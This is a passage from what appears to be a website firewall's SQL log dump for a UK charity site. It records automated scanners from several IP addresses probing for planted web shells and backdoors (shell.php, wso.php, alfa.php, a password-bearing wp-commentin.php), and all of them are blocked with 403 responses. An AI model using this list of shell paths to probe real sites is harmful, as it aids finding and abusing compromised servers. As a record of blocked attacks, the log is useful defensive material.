Safari\\/537.36\"}','2IiK7OGUqVx1ndS3ekpFsz5l',0,1673898034.5460,110,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1hGs7VPcWxtpFUdwK9ZHREOv',0,1673898034.8292,105,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K7cGYs9ifzwbWoRUQAylmJOV',0,1673898035.1609,90,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FQkJoSeG7KfyMXUgswcjqrDd',0,1673898035.5190,94,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','T5B4LcuozvgK6EJdWMtFRAHC',0,1673898035.8730,142,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2nJuwc6h3lVqLto5KAZkQsHz',0,1673898036.2922,95,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H5f6Dt1JGyzdwmrRBUMcpQoq',0,1673898036.6310,116,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jLZWKIUch0x3ykEfYHrJsuqv',0,1673898036.9890,98,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1JWiUzEwaOf6Vp52XhyColMk',0,1673898037.2802,115,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eOqkzpn4VPstjrFaD9cKGJdx',0,1673898039.6544,151,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QGsrhya6q0xfV4ocmR91dn8T',0,1673898040.0919,98,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wtZMPUd7brchlQNYV1XJK2aI',0,1673898040.4919,91,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/olux.php%09%09','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x3gwSA2zLi7Dl6BIoZubrq09',0,1673898040.9864,107,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hHkSYifxL2tNrJzM6AEqm1C9',0,1673898041.3091,108,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SzlvMWBqapP8FD4TbJCry0Nw',0,1673898042.6576,98,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/administrator/templates/bluestork/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8NVin9A1tpqoJGHBy0LUWDkm',0,1673898043.0826,136,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/administrator/templates/bluestork/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ADutwrBE83oX0nZfMQNiLKcl',0,1673898043.4665,89,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/administrator/templates/hathor/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FNjZt1KkWeSyAC4P89Jbq3ci',0,1673898043.7811,91,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/administrator/templates/hathor/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OnkhCuiG4v0qt1xrXzpK9EAQ',0,1673898044.0846,121,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/administrator/templates/isis/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','c37g4l0JpDmWvzVKbhF5t2G8',0,1673898044.4925,143,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/administrator/templates/isis/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rHYzuqGUpBsxIyEe4j3OSiod',0,1673898045.0458,106,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6PgEVpkqzbdr9YeOGyZIARmv',0,1673898045.4473,142,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/ja_purity/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','15KbcyzplVvaP3WEUr6OR8NF',0,1673898046.0205,95,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rE1TOB3QzMRv9GCktAUxpJDd',0,1673898046.3050,118,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','q5AN6GDzchpCiFBvWo2kMt3d',0,1673898046.6877,88,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez3/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H9y2t1Uqxz3b0ZgJrdKMupXD',0,1673898046.9773,100,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MvRhj1wmqlSYV5sQdACx26OJ',0,1673898047.3004,93,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez5/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','04REiqgrwF3ICJTV7va6slOP',0,1673898047.6840,97,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez_20/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MlsNPdqD8n4RHAbawIEkuiyO',0,1673898047.9837,129,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/beez_20/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N7Tbarst5xWhp4IA23ERMJwv',0,1673898048.3893,87,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/protostar/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2ILGflRNTazbwo3J5ckZX1gH',0,1673898048.7708,98,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/protostar/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qzCrQJMKAZhL6HBucmtR8Xl5',0,1673898049.0811,102,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/atomic/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3oJQdA4zYE8bqwTP1avSMLsF',0,1673898049.3486,91,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/templates/atomic/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q3ir1Vd0OksCZhbwHKAB6XJY',0,1673898049.6397,112,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N3WBGxnCTJq0rlyFbPaYiOS4',0,1673898049.9474,94,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','Q2GzxEXA8ZUtloW6I5baBJ1e',0,1673898313.9550,171,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','TbhdyoxeFIYUWLw6vPngOr0A',0,1673898314.5348,236,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','oc0XK1ak6qUhbMtgDQFnjdWf',0,1673898315.1804,224,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','HzEAFLXb4rpfuS38Cvjth2i1',0,1673898315.8240,160,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','6UqfzyV5K4iBXRkmQx3PZFYH',0,1673898316.4231,150,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','FO2jfpr7oPk9TahslwNBb3Xm',0,1673900389.1767,142,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','vfkuezwC4N0AF3P7JSTUpgEH',0,1673900389.6259,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','m4Sw7MyDtHTBdJxV20l9QPup',0,1673900390.6202,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QkNF4Ep7xw8UdHqsLcADmjZO',0,1673900391.5563,116,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','xghod7BFMmLyC1zZOqvr268W',0,1673900392.4995,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Dt7yk53YZUNzR2PvMFoOICmd',0,1673900393.8299,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','9uOsPC2nDc4l1kfxMjdIZYzK',0,1673900394.7822,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','pBw3J0f1OoHxdYtUPMym7iFg',0,1673900396.1468,154,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','azZhMS15uPDnkf3oK0mgwrXc',0,1673900397.5290,103,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','DO6SpX5gkntTsEfZhyI13eW2',0,1673900398.5440,89,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','L30Bx9TUrNKIeshibOG5HXW7',0,1673900399.5024,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','dSvRHF7b8Dkhc6MVqi1wQJjN',0,1673900400.5778,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','KvDkXCI36GVfrsp8mY2w49Lc',0,1673900401.7635,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','JqLtuhEaWASxsMro5F4izdPG',0,1673900403.0233,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','eWwidTZqmHscKY6DR5yBO103',0,1673900404.2524,128,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','sucDCpmPyHXMktFj6b3QSVqn',0,1673900405.2099,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','kwXS9zHMq0nU7TiORtmDg3PB',0,1673900405.5946,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','KjPaCXS5B0bhezQ1nOG7sdR6',0,1673900407.4424,115,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','uRjvpS4mzxQgcHXkEDi8eqJG',0,1673900408.5309,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','CDF8rx32QHafqKeipNzVh05R',0,1673900410.0111,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','sptCiI4f1RVJ8eS6uOABw7N0',0,1673900414.9983,125,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ucEXYnmxqRdwH4hCSbPDWtZV',0,1673900416.5560,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','d5ZypWm34NEDebxRStVKvh2a',0,1673900418.6659,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','PgQkoywa8Y7mVf0jiFdhrcDZ',0,1673900420.0506,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','p0TXQvNO3Rw7Daumczox5FbV',0,1673900422.3019,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','y4SrBmtfbRaGCOiEHwedgJ5K',0,1673900423.5036,121,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/system_log.php?bala=up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QwrZpF8iKJfD3Ymjt6d4Oyhe',0,1673900425.7289,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-backup-sql-302.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','g5A4WjHlkUrIPQ1hSzZdMxe3',0,1673900426.7628,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','oOVEkJm8ZwY7zcHn1lRyv439',0,1673900427.7687,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/index.php?3x=3x','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','TXpf4s78raqIbYzU6LEcNVWQ',0,1673900463.4203,115,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','3gvR9qmGBEelXOUQcad6WCYJ',0,1673900463.8205,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','YbvUBFGHIKDOjeNSC70Luix9',0,1673900464.2066,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','qlca5Q9Eh2vdbN8Bp3xIX1WA',0,1673900464.5828,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','VxJ0TymwZL5OBgIijz7sdSMq',0,1673900464.9730,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','GDONapHCEY9qhXfZvRyM0gAb',0,1673900465.3444,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','MYzVIA8Xj1CHOBh5ZmsFblaG',0,1673900465.7499,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','EKlZ5iHu3Yk9fB7oSTqxPDRA',0,1673900466.1294,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','oDV2u37zeqH4rMtIUCFXdNgR',0,1673900466.4977,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ou0DOwialK6JqtGsMTLy8XFz',0,1673900466.8800,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','UznZ1q8MDTtwIOmjWpNxbYoi',0,1673900467.2573,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/test.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','sRt4CTjG7VHywaqlK8om6U0v',0,1673900467.6254,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','B4OMstDep1hlTGQyvXHdoNa8',0,1673900468.0221,84,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','zyj1OMlxrcYeDotbRmTC4B2E',0,1673900468.3956,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/config.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','GHjuerw1cmJl0qoaxTIMR79U',0,1673900468.7791,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','YDM0BIoK1fuXbTq8g2dLaCv4',0,1673900469.1576,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','NXiHhI89mqj0Vc7pOaGUsABf',0,1673900469.5305,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shells.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','25zrVefSX3ynJhiC8GL9jEFZ',0,1673900469.9615,100,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','ntMioPYC3JS9xZbu8sRdOA57',0,1673904802.1257,600,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"python-requests\\/2.28.1\"}','Q8pmIWveNVYFO6sHAZw5ufjD',0,1673906017.8394,108,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/2index.php','','{\"1\":\"python-requests\\/2.28.1\"}','JM1ZNI36xgQSr7cY2RvU9iOm',0,1673906018.0356,114,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/3index.php','','{\"1\":\"python-requests\\/2.28.1\"}','JibaosFv89IULXkVPwDfRQxM',0,1673906018.2754,88,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.equalitywalk.org.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','AY4hRQ89VcW5sL0TGelrNo21',0,1673906018.4841,97,'','GET',403,0,700,0,1,'',0)